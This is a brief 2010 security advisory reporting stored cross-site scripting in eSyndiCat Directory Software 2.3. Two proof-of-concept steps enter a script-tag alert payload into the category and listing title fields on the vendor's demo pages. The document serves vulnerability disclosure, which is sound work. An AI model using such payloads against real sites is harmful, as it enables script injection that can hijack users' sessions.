------------------------------------------------------------------------- 
eSyndiCat Directory Software 2.3 -  Cross-Site Scripting ( XSS )

http://www.esyndicat.com/ 
 
25 - 11 - 2010  
 
Avram Marius ( d3v1l )  
 
http://twitter.com/securityshell  -  http://security-sh3ll.blogspot.com

--------------------------------------------------------------------------
Poc: 1
 
http://www.esyndicat.com/demo/suggest-category.php?id=364
 
Suggest Category where inside Category title type something like "><script>alert('XSS')</script> 
 

Screen : 
 
http://twitpic.com/3aq5q8 
 
--------------------------------------------------------------------------
 
Poc: 2 

http://www.esyndicat.com/demo/suggest-listing.php?id=0 

Suggest Listing where Fields Title can be "><script>alert('XSS')</script> 

 
Screen :   

http://twitpic.com/3aq7s0

--------------------------------------------------------------------------